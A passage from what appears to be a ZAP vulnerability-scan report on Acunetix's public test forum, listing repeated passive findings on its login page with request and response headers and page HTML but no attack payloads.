class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=68 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D68" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=69 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
